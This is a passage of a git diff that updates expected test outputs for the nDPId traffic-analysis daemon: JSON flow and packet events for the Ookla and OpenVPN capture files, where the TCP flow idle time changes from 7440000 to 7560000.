-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069115107,"flow_last_seen":1491069115107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115107,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491069115107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069115107,"pkt":"gCqojWksxCwDBkn+CABFAABAzJ5AAEAGAADAqAEHLiz9u8gPH5CtI6zKAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4f9gAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491069115144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069115144,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBx+QyA8qkdUorSOsy6ASOJC7tQAAAgQFrAQCCAp\/4XceDd4f9gEDAwU="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491069115144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069115144,"pkt":"gCqojWksxCwDBkn+CABFAAA0VElAAEAGAADAqAEHLiz9u8gPH5CtI6zLKpHVKYAQECztvQAAAQEICg3eIBp\/4Xce"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} -00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1491069108756,"flow_last_seen":1491069114084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":2980,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069108756,"flow_last_seen":1491069108756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069108756,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491069108756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069108756,"pkt":"gCqojWksxCwDBkn+CABFAABAClpAAEAGAADAqAEHLiz9u8gHAFAHQx4AAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4HoAAAAAAEAgAA"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491069108793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069108793,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBwBQyAdRUNK1B0MeAaASOJAJ5wAAAgQFrAQCCAp\/4XDqDd4HoAEDAwU="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491069108793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069108793,"pkt":"gCqojWksxCwDBkn+CABFAAA0s5FAAEAGAADAqAEHLiz9u8gHAFAHQx4BUVDStoAQECztvQAAAQEICg3eB8R\/4XDq"} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069115107,"flow_last_seen":1491069115107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115107,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491069115107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069115107,"pkt":"gCqojWksxCwDBkn+CABFAABAzJ5AAEAGAADAqAEHLiz9u8gPH5CtI6zKAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4f9gAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491069115144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069115144,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBx+QyA8qkdUorSOsy6ASOJC7tQAAAgQFrAQCCAp\/4XceDd4f9gEDAwU="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491069115144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069115144,"pkt":"gCqojWksxCwDBkn+CABFAAA0VElAAEAGAADAqAEHLiz9u8gPH5CtI6zLKpHVKYAQECztvQAAAQEICg3eIBp\/4Xce"} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} +00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1491069108756,"flow_last_seen":1491069114084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":2980,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","packets-captured":5086,"packets-processed":5086,"total-skipped-flows":0,"total-l4-data-len":4349113,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1491069155251} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5086/5086 diff --git a/test/results/openvpn.pcap.out b/test/results/openvpn.pcap.out index 5bb3aeaee..66753085c 100644 --- a/test/results/openvpn.pcap.out +++ b/test/results/openvpn.pcap.out @@ -1,17 +1,17 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"openvpn.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1467904946700} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467904946700,"flow_last_seen":1467904946700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1467904946700,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467904946700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946700,"pkt":"hCYVLjtSAA6OGXEMCABFAAA8ANVAAEAGYbLAqAFNLmXn2ursAbu+lXueAAAAAKACchBbjAAAAgQFtAQCCAoADXtLAAAAAAEDAwE="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1467904946755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946755,"pkt":"AA6OGXEMhCYVLjtSCABFoAA8AABAADQGbecuZefawKgBTQG76uxsxVWWvpV7n6AScSBx2QAAAgQFtAQCCAoANCgCAA17SwEDAwE="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1467904946755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467904946755,"pkt":"hCYVLjtSAA6OGXEMCABFAAA0ANZAAEAGYbnAqAFNLmXn2ursAbu+lXufbMVVl4AQOQjYsgAAAQEICgANe1AANCgC"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467904946700,"flow_last_seen":1467904946700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1467904946700,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467904946700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946700,"pkt":"hCYVLjtSAA6OGXEMCABFAAA8ANVAAEAGYbLAqAFNLmXn2ursAbu+lXueAAAAAKACchBbjAAAAgQFtAQCCAoADXtLAAAAAAEDAwE="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1467904946755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946755,"pkt":"AA6OGXEMhCYVLjtSCABFoAA8AABAADQGbecuZefawKgBTQG76uxsxVWWvpV7n6AScSBx2QAAAgQFtAQCCAoANCgCAA17SwEDAwE="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1467904946755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467904946755,"pkt":"hCYVLjtSAA6OGXEMCABFAAA0ANZAAEAGYbnAqAFNLmXn2ursAbu+lXufbMVVl4AQOQjYsgAAAQEICgANe1AANCgC"} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":96,"packets-processed":95,"total-skipped-flows":0,"total-l4-data-len":9094,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1470218591746} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470218591746,"flow_last_seen":1470218591746,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470218591746,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1470218591746,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1470218591746,"pkt":"mAyC0zx8AAjKQoXqCABFAABG3rhAAEARTXXAqCsMizuXiaIjNXAAMosJOLAsz\/G18BdPwJFmbjsSS62jkXMxe5OXItH+Y74AAAABV6HBXwAAAAAA"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1470218591941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1470218591941,"pkt":"AAjKQoXqmAyC0zx8CABFAABSYIhAADIR2ZmLO5eJwKgrDDVwoiMAPhWBQPd\/wu\/b4j9X3sTI1WVNByO\/jAvlQThWMnDPrhMAAAABV6HBXwEAAAAAsCzP8bXwF08AAAAA"} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470218591746,"flow_last_seen":1470218591941,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470218591941,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470218591942,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470218591942,"pkt":"mAyC0zx8AAjKQoXqCABFAABO3uZAAEARTT\/AqCsMizuXiaIjNXAAOpZEKLAsz\/G18BdPyDdJemqNaU65YLasCHjnV9mH+DAAAAACV6HBXwEAAAAA93\/C79viP1c="} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1470218600860,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1470218600860,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":179,"packets-processed":178,"total-skipped-flows":0,"total-l4-data-len":19167,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1472334890224} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472334890224,"flow_last_seen":1472334890224,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1472334890224,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1472334890224,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1472334890224,"pkt":"mAyC0zx8MFLLbJwbCABFAABGe8pAAEARsF3AqCsSizuXiTVwNXAAMg7DOGYO4pqkkLBZfF5v2e87DGOeGNd7GPORrKCUl+wAAAABV8IMKgAAAAAA"} diff --git a/test/results/oracle12.pcapng.out b/test/results/oracle12.pcapng.out index 11aef0fe2..32385cd18 100644 --- a/test/results/oracle12.pcapng.out +++ b/test/results/oracle12.pcapng.out @@ -1,11 +1,11 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"oracle12.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 